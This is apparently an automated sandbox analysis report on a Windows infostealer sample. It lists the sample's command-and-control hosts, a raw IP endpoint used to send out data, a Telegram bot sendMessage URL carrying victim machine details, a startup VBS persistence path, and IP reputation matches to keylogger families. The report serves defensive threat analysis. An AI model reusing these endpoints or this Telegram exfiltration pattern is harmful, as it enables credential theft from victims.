                                  https://duckduckgo.com/ac/?q=svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgsvchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botsvchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.office.com/lBsvchost.exe, 00000008.00000002.2547584481.0000000005715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005950000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.orgsvchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://chrome.google.com/webstore?hl=ensvchost.exe, 0000000B.00000002.2547860084.0000000005924000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=en8svchost.exe, 0000000B.00000002.2547860084.000000000591F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aborters.duckdns.org:8081svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.office.com/8svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:8081svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.org/qsvchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000008.00000002.2547584481.00000000056E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/8.46.123.189$svchost.exe, 00000008.00000002.2547584481.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.000000000580B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.orgsvchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.1898svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgch8svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20asvchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          188.114.96.3
                                                                                          reallyfreegeoip.orgEuropean Union
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          132.226.247.73
                                                                                          checkip.dyndns.comUnited States
                                                                                          16989UTMEMUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1583657
                                                                                          Start date and time:2025-01-03 09:20:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 52s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:16
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:FACT0987789000900.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 59
                                                                                          • Number of non-executed functions: 303
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          TimeTypeDescription
                                                                                          03:21:13API Interceptor2784896x Sleep call for process: svchost.exe modified
                                                                                          09:21:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                        Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                              188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.mffnow.info/1a34/
                                                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.mydreamdeal.click/1ag2/
                                                                                                              SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.questmatch.pro/ipd6/
                                                                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                              need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.rtpwslot888gol.sbs/jmkz/
                                                                                                              QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                              • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                              • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                              132.226.247.73file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              reallyfreegeoip.orgPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 188.114.96.3
                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 188.114.97.3
                                                                                                              checkip.dyndns.comPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              api.telegram.orgimage.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                              • 149.154.167.220
                                                                                                              eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUhttps://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.99
                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                              • 149.154.167.220
                                                                                                              eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              CLOUDFLARENETUSSetup.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.32.1
                                                                                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                              • 1.1.1.1
                                                                                                              ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                              • 104.20.4.235
                                                                                                              https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.26.13.57
                                                                                                              hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                                                              • 172.67.19.24
                                                                                                              http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.96.1
                                                                                                              https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.96.1
                                                                                                              http://adflowtube.comGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              http://authmycookie.comGet hashmaliciousUnknownBrowse
                                                                                                              • 172.67.198.196
                                                                                                              UTMEMUSPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 132.226.227.252
                                                                                                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.8.169
